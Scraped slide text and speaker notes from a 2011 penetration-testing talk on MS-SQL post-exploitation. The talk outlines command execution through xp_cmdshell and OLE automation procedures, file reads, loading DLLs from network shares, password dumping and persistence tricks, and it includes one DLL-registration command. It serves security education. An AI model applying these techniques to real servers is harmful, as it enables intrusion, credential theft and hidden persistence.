Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 

Everything you should already know about MS-SQL post-exploitation

  • 1. ATTACK RESEARCH ADVANCED COMPUTER SECURITY RESEARCH & CONSULTING
  • 2. MS-SQL Post Exploitation: Everything you should already know. Presented By: Rob Beck
  • 3. Name: Rob Beck (whitey) Title: Director of Assessment Contact: rob.beck@attackresearch.com Background: Career pen-tester (MS/@stake/Honeywell/AR) Security hobbyist and researcher Slacker All About Me 1 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 4. What Is SQL Post-Exploitation? The steps taken by an attacker following successful SQL access or command execution. Motivation or purpose Level of access achieved Amount of stealth required Persistence 2 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 5. Why MS-SQL Post Exploitation? Most pen-test resources lack details The explanations given are limited Extended functionality not covered Lots of don’ts without reason in hardening docs People still aren’t using this stuff or get stuck Apparently it was interesting enough for you 3 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 6. Nothing covered in this presentation is new Everything presented is actively being used Everything presented can be prevented This talk assumes you have SQL access MS-SQL is a subject of interest, not expertise The subject is databases, which is boring Pro-tip: You might be bored 4 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 7. What’s Covered Utilizing SQL procedures to attack the host Lesser known evils (some don’ts explained) Credential harvesting scenario Potential for using the DB in attacks Persistence tricks 5 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 8. If you have DBO/sa you win! (There’s more to it) Owning the host or just the DB Persistence If you don’t have DBO/sa it could be research time Stored procedures Extended stored procedures Assemblies Good old fashioned exploits Sometimes it’s just about the data I Have Access Now What? 6 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 9. What’s Really Important Getting xp_cmdshell() – Do you need it? Adding accounts - Not too stealthy Total capabilities in the SQL instance Blind injection: not always so blind Network access to/from SQL instance Validity of SQL credentials elsewhere Things to Consider 7 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 10. Lessons Learned Over the past year: 30 assessments 20 of them were successful due to SQL 0 of them detected anything wrong All of them neglected to restrict access 3 of them had blank sa account instances Only 5 of them had plans to upgrade to SQL 2k8 Development environments were always BAD 8 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 11. Large numbers of organizations are still running SQL as NT AUTHORITYYSTEM If it’s not local system, it’s most likely still admin If it’s a domain account Used elsewhere Still likely to be system admin Of the small percentage who aren’t local system or admin Few if any additional hardening steps are being taken Shared accounts on hosts that were using privileged accounts People Are Still Running SQL As System 9 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 12. A majority of SQL instances that exist are legacy and will be for some time Everything is vanilla Shared accounts are a certainty Logging is performed, but never observed Lack of access is usually a by-product Reality 10 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 13. People are lazy Nobody has the resources The people who make the rules Good enough is better than best Why Are Things Broken 11 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 14.
  • 25.
  • 36.
  • 38. sp_OACreate12 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 39. Check That Advanced Options Are Enabled If it doesn’t execute, it might need some help. Each of these may require a call to sp_configure*: xp_cmdshell Procedure Name Configuration Option Name xp_cmdshell sp_OACreate xp_sendmail Ole Automation Procedures SQL Mail XPs * A query of ‘UPDATE sys.configurations [..]’ also does the trick 13 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 40.
  • 41. Results aren’t always as easy to get as xp_cmdshell
  • 42. Even if procedure access is allowed, object access might not be14 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 43. You Don’t Have To Script A File Read If sp_OACreate and the Scripting.FileSystemObject is nice, but it’s a bit much for just reading the contents of a file. A bulk insert will usually get the job done. 15 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 44.
  • 45. Administrator can still become SYSTEM
  • 46. You can still operate as the SQL account16 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 47. Some Things Require Finesse ..there are limitations even to the ex-sprocs. 17 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 48. Some Things Require More Finesse Wscript’sRegRead would be a good choice, but.. ..though not all failures are a bad thing (not for us). 18 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 49. Forget Finesse, Go With What You Known Finally. 19 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 50.
  • 51. Any custom registered component20 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 52. Why Not Register Your Own If you can execute commands and have elevated access, why not use your own controls? -- RegSrv32.exe /c <your OLE DLL/OCX> 21 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 53. SQL Methods For Compiled Code SQL provides a number of facilities for running compiled code: Extended stored procedures Assemblies OLE Automation Standard console access 22 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 54. File Locations Can Be Fun SQL Recognizes Standard File Paths: UNC shares are valid paths in the creation of extended stored procedures and assemblies. Alternate streams work just fine. 23 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 55. The SQL As An Attack Framework Depending on the level of access, SQL makes a great attack platform Loading of compiled code modules Local files Network shares Execution of scripting resources Facilitates the storage of results (go figure) No one ever expects the SQL instance! 24 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 56. Where To Go From Here Silly Persistence Tricks – The dumb stuff usually works best. Triggers Guest account Spiking the Model database ALWAYS dump the SQL passwords Data copying and backup permissioning 25 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 57. Questions? 26 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com

Editor's Notes

  1. Luckily, or unfortunately (point of view), this is still the case and all too common.
  2. Luckily, or unfortunately (point of view), this is still the case and all too common.
  3. Luckily, or unfortunately (point of view), this is still the case and all too common.
  4. DBAs are always told to disable these extended stored procedures, but it’s not always covered why they’re so bad.The dirtree, fileexist, and subdirs ex-sprocs can be a lot more devastating (useful) than one might think.Even the sp’s (rather than ex-sp’s) can pose a significant risk as well if they accept a UNC path as a parameter.A lot of these have been ACL’d away from normal users by default, but xp_fileexist made it’s way into MS-SQL2k8.CREATE ASSEMBLY also allows UNC paths, not an extended sproc, but worth mentioning here.
  5. A lot of pentesters and attackers assume that xp_cmdshell isn’t available because commands don’t execute;they’re further confused when a call to sp_addextendedproc doesn’t work – xp_cmdshell needs to be enabled.
  6. Using the sp_OACreate, sp_OAMethod, and sp_OADestroy methods the same functionality of xp_cmdshell can be accomplished.Unfortunately results of a command execution aren’t directly accessible and must go to a temporary storage (file on disk).Luckily since it’s being used in a scripting environment, we can access the %TEMP% and %SYSTEM% environment variables to help stage temp storage directories and other valuable information.
  7. No sense in going through all the trouble of scripting a file read when you can have SQL do all the work.
  8. Minimal footprints on the system is always better for stealth.
  9. Fail #1
  10. Fail #2 – but this looks interesting. 5
  11. Now we’re in business.
  12. The limited documentation and examples available on the sp_OA methods usually only cover Wscript, the system is full of other fun controls.
  13. If you can access Wscript to execute shell commands, why stop there?If you have expanded access on the host, you can always register your own controls for use by the sp_OA methods.
  14. SQL facilitates 2 existing methods that will load and execute compiled code.
  15. All of the typical path fun for files works from inside SQL.
  16. Repurpose the platform to facilitate your foot-hold into an environment.Everything an attacker would need is available in SQL, and if you operate entirely in the environment you leave a minimal footprint on the actual host.